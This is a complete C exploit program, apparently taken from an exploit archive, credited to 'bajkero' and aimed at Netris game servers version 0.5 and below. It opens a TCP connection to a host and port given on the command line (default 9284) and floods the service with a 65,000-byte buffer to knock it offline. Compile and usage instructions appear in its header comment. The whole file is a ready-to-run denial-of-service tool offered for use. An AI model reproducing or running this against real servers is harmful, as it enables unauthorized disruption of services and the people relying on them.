HP Netris v0.5 and below remote denial of service exploit.
1511466d20ead8a76a69420ed7ccb8dcb916dcf1d94877d562d9820209800c33
/*
* HP-netris_DoS.c - Remote netris <= 0.5 DoS.
*
* Artur Byszko / bajkero <bajkero@security.hack.pl>
* #hackpl@efnet || #blackhat@ircnet
*
* % gcc -Wall -ansi -pedantic -o HP-netris_DoS HP-netris_DoS.c
* % ./HP-netris_DoS host [port]
*
* Greets: ducer, ^sysq, #darknet@efnet.
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#define PORT 9284
void usage(char *a);
int main(int argc, char *argv[])
{
int gniazdo;
char buff[65000];
struct sockaddr_in sin;
struct hostent *host;
fprintf(stdout, " * Remote netris <= 0.5 DoS\n");
fprintf(stdout, " * Artur Byszko / bajkero * #hackpl@efnet \n");
if(argc < 2) usage(argv[0]);
host = gethostbyname(argv[1]);
if(!host) {
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
gniazdo = socket(AF_INET, SOCK_STREAM, 0);
if(!gniazdo)
{
perror("socket()");
exit(EXIT_FAILURE);
}
bzero(&sin, sizeof(sin));
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
sin.sin_family = AF_INET;
if(argv[2]) {
sin.sin_port = htons(atoi(argv[2]));
}
else {
sin.sin_port = htons(PORT);
}
if((connect(gniazdo, (struct sockaddr *)&sin, sizeof(sin))) < 0)
{
perror("connect()");
exit(EXIT_FAILURE);
}
memset(buff, 'a', sizeof(buff));
printf("-> Sending buff.. \n");
write(gniazdo, buff, sizeof(buff));
close(gniazdo);
printf("-> Done..\n");
return(0);
}
void usage(char *a)
{
printf("Usage: %s host [port]\n", a);
exit(EXIT_FAILURE);
}